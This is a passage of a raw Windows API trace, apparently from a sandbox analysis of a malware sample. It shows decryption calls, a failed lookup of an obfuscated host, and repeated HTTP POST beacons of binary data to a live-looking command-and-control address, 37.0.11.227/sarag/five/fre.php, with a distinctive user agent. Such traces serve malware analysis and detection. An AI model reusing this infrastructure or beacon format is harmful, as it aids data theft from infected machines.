(in: hProv=0x6aef68, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0181.590] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0181.591] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0181.592] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0181.592] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0181.592] GetProcessHeap () returned 0x690000 [0181.593] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0181.595] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0181.595] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0181.609] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0181.616] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0181.617] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0181.617] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0181.618] GetProcessHeap () returned 0x690000 [0181.618] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0181.618] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0181.619] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0181.620] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0181.620] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0181.623] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0181.624] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0181.625] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0181.658] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0181.664] GetProcessHeap () returned 0x690000 [0181.664] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0181.664] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0181.665] GetProcessHeap () returned 0x690000 [0181.666] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0181.670] GetProcessHeap () returned 0x690000 [0181.670] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0181.670] GetProcessHeap () returned 0x690000 [0181.672] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0181.733] GetProcessHeap () returned 0x690000 [0181.733] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0181.734] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0181.735] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0181.746] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0181.748] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeee0) returned 1 [0181.850] GetProcessHeap () returned 0x690000 [0181.850] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0181.853] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0181.854] CryptImportKey (in: hProv=0x6aeee0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0181.856] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0181.858] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0181.860] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0181.860] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0181.862] GetProcessHeap () returned 0x690000 [0181.862] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0181.865] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0181.872] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0181.874] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0181.876] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0181.887] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0181.888] CryptReleaseContext (hProv=0x6aeee0, dwFlags=0x0) returned 1 [0181.888] GetProcessHeap () returned 0x690000 [0181.888] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0181.896] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0181.897] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0181.907] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0181.915] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0181.918] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0181.919] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0181.928] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0181.929] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0181.929] GetProcessHeap () returned 0x690000 [0181.929] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0181.930] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6af9e8*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae850*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0181.930] GetProcessHeap () returned 0x690000 [0181.930] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab470 [0181.930] socket (af=2, type=1, protocol=6) returned 0x2ec [0181.931] connect (s=0x2ec, name=0x6ae850*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0182.004] FreeAddrInfoW (pAddrInfo=0x6af9e8*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae850*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0182.004] GetProcessHeap () returned 0x690000 [0182.004] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0182.004] GetProcessHeap () returned 0x690000 [0182.004] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b27b0 [0182.005] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0182.006] wvsprintfA (in: param_1=0x6b27b0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0182.007] GetProcessHeap () returned 0x690000 [0182.007] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6a9cb8 [0182.007] GetProcessHeap () returned 0x690000 [0182.015] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0182.016] GetProcessHeap () returned 0x690000 [0182.016] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0182.016] GetProcessHeap () returned 0x690000 [0182.016] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b27b0 [0182.017] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0182.018] wvsprintfA (in: param_1=0x6b27b0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0182.018] GetProcessHeap () returned 0x690000 [0182.018] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0182.018] GetProcessHeap () returned 0x690000 [0182.019] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0182.019] send (s=0x2ec, buf=0x6abd08*, len=242, flags=0) returned 242 [0182.020] send (s=0x2ec, buf=0x6aba40*, len=159, flags=0) returned 159 [0182.020] GetProcessHeap () returned 0x690000 [0182.020] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b27b0 [0182.020] recv (in: s=0x2ec, buf=0x6b27b0, len=4048, flags=0 | out: buf=0x6b27b0*) returned 204 [0182.105] GetProcessHeap () returned 0x690000 [0182.106] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0182.106] GetProcessHeap () returned 0x690000 [0182.106] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0182.107] GetProcessHeap () returned 0x690000 [0182.107] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9cb8 | out: hHeap=0x690000) returned 1 [0182.107] GetProcessHeap () returned 0x690000 [0182.108] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0182.108] closesocket (s=0x2ec) returned 0 [0182.109] GetProcessHeap () returned 0x690000 [0182.109] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab470 | out: hHeap=0x690000) returned 1 [0182.109] GetProcessHeap () returned 0x690000 [0182.109] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0182.109] GetProcessHeap () returned 0x690000 [0182.109] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0182.110] GetProcessHeap () returned 0x690000 [0182.110] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0182.110] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b27b0, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x8ec) returned 0x2ec [0182.112] Sleep (dwMilliseconds=0xea60) [0182.113] GetProcessHeap () returned 0x690000 [0182.113] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0182.114] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.115] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0182.122] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.123] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0182.130] GetProcessHeap () returned 0x690000 [0182.130] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0182.132] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.133] CryptImportKey (in: hProv=0x6af188, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0182.133] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.134] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0182.135] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.135] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0182.135] GetProcessHeap () returned 0x690000 [0182.136] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0182.137] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.137] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0182.138] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.138] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0182.139] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.144] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0182.144] GetProcessHeap () returned 0x690000 [0182.144] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0182.145] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0182.145] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0182.146] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0182.146] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0182.148] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0182.148] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0182.149] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0182.149] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0182.149] GetProcessHeap () returned 0x690000 [0182.149] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0182.150] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0182.150] GetProcessHeap () returned 0x690000 [0182.150] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0182.151] GetProcessHeap () returned 0x690000 [0182.151] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0182.160] GetProcessHeap () returned 0x690000 [0182.160] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0182.160] GetProcessHeap () returned 0x690000 [0182.160] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0182.161] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.162] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0182.168] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.169] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0182.179] GetProcessHeap () returned 0x690000 [0182.179] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0182.180] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.180] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0182.181] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.182] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0182.183] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.183] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0182.183] GetProcessHeap () returned 0x690000 [0182.184] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0182.185] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.185] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0182.186] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.186] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0182.187] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.188] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0182.189] GetProcessHeap () returned 0x690000 [0182.189] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0182.190] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0182.190] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0182.191] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0182.192] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0182.193] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0182.193] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0182.194] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0182.194] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0182.194] GetProcessHeap () returned 0x690000 [0182.194] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0182.195] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6afb78*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae898*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0182.195] GetProcessHeap () returned 0x690000 [0182.195] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab450 [0182.195] socket (af=2, type=1, protocol=6) returned 0x2f0 [0182.195] connect (s=0x2f0, name=0x6ae898*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0182.223] FreeAddrInfoW (pAddrInfo=0x6afb78*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae898*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0182.223] GetProcessHeap () returned 0x690000 [0182.224] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0182.224] GetProcessHeap () returned 0x690000 [0182.224] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b27b0 [0182.224] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0182.225] wvsprintfA (in: param_1=0x6b27b0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0182.225] GetProcessHeap () returned 0x690000 [0182.225] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6a99b8 [0182.225] GetProcessHeap () returned 0x690000 [0182.226] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0182.226] GetProcessHeap () returned 0x690000 [0182.226] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0182.226] GetProcessHeap () returned 0x690000 [0182.226] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b27b0 [0182.227] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0182.228] wvsprintfA (in: param_1=0x6b27b0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0182.228] GetProcessHeap () returned 0x690000 [0182.228] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0182.228] GetProcessHeap () returned 0x690000 [0182.228] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0182.230] send (s=0x2f0, buf=0x6abd08*, len=242, flags=0) returned 242 [0182.231] send (s=0x2f0, buf=0x6aba40*, len=159, flags=0) returned 159 [0182.231] GetProcessHeap () returned 0x690000 [0182.231] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b27b0 [0182.231] recv (in: s=0x2f0, buf=0x6b27b0, len=4048, flags=0 | out: buf=0x6b27b0*) returned 204 [0182.305] GetProcessHeap () returned 0x690000 [0182.305] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0182.305] GetProcessHeap () returned 0x690000 [0182.306] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0182.306] GetProcessHeap () returned 0x690000 [0182.306] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a99b8 | out: hHeap=0x690000) returned 1 [0182.306] GetProcessHeap () returned 0x690000 [0182.306] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0182.306] closesocket (s=0x2f0) returned 0 [0182.307] GetProcessHeap () returned 0x690000 [0182.307] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab450 | out: hHeap=0x690000) returned 1 [0182.307] GetProcessHeap () returned 0x690000 [0182.307] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0182.307] GetProcessHeap () returned 0x690000 [0182.308] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0182.308] GetProcessHeap () returned 0x690000 [0182.308] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0182.308] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b27b0, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xa6c) returned 0x2f0 [0182.310] Sleep (dwMilliseconds=0xea60) [0182.311] GetProcessHeap () returned 0x690000 [0182.311] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0182.312] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.312] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0182.319] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.320] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0182.328] GetProcessHeap () returned 0x690000 [0182.328] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0182.329] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.329] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0182.330] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.337] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0182.338] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.338] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0182.338] GetProcessHeap () returned 0x690000 [0182.338] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0182.339] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.339] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0182.340] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.340] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0182.341] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0182.341] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 